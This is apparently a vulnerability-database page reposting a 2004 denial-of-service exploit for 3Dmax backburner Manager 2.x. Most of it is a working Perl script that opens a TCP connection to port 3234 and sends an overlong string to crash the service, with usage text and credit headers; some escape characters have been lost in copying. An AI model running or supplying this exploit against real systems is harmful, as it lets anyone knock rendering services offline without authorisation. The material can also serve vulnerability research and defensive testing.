3Dmax 6.x backburner Manager 2.2 – Denial of Service
漏洞ID | 1054777 | 漏洞类型 | |
发布时间 | 2004-11-28 | 更新时间 | 2004-11-28 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#3Dmax backburner Manager Dos Exploit
#There are security hole in 3Dmax backburner Manager Default listen port is 3234.
#It's can be Dos by long string
#Tested on Version
#3dmax 5.0 backburner Manager Version 2.0
#3dmax 6.0 backburner Manager Version 2.2
#3dmax 6.0 SP1 backburner Manager Version 2.2
#All Windows OS
#Found By Xtiger -->www.Xtiger.net&www.ThySea.com
#Code by Xtiger [email protected]
#Reference: http://jishu.thysea.com/index.php?modules=show&id=10327
----------------------------------------------------------------
#!C:perlbinperl.exe
use IO::Socket;
my $progname = $0;
$progname =~ s,.'*/,,;
$progname =~ s/.w*$//;
$host = shift || 'localhost';
$port = shift || '3234';
$title = " =============================================n‖ 3Dmax backburner Manager Dos Exploit 1.0! ‖n =============================================n BY tiger---www.Xtiger.net&www.ThySea.comn";
$Usage = " Usage: $progname [Host] [port](default is 3234)n";
if ($host > 0){
dos();
}
else {
usage();
}
sub dos
{
my $socket = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
)
or print "$title [*] ERR-->can't connect to $host:$port! :(n" and exit;
print ($title, "[*] connected to $host:$portn");
print "[*] Sending string...n";
print $socket ("?"x(2364),"rn") or die "$title [*] ERR-->Sending string failed! :(n";
print "[*] maybe crashed!n";
$socket->close;
}
sub usage
{
die $title,$Usage;
}
# milw0rm.com [2004-11-28]
相关推荐: WebHost Automation Helm Control Panel Multiple Input Validation Vulnerabilities
WebHost Automation Helm Control Panel Multiple Input Validation Vulnerabilities 漏洞ID 1097706 漏洞类型 Input Validation Error 发布时间 2004…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666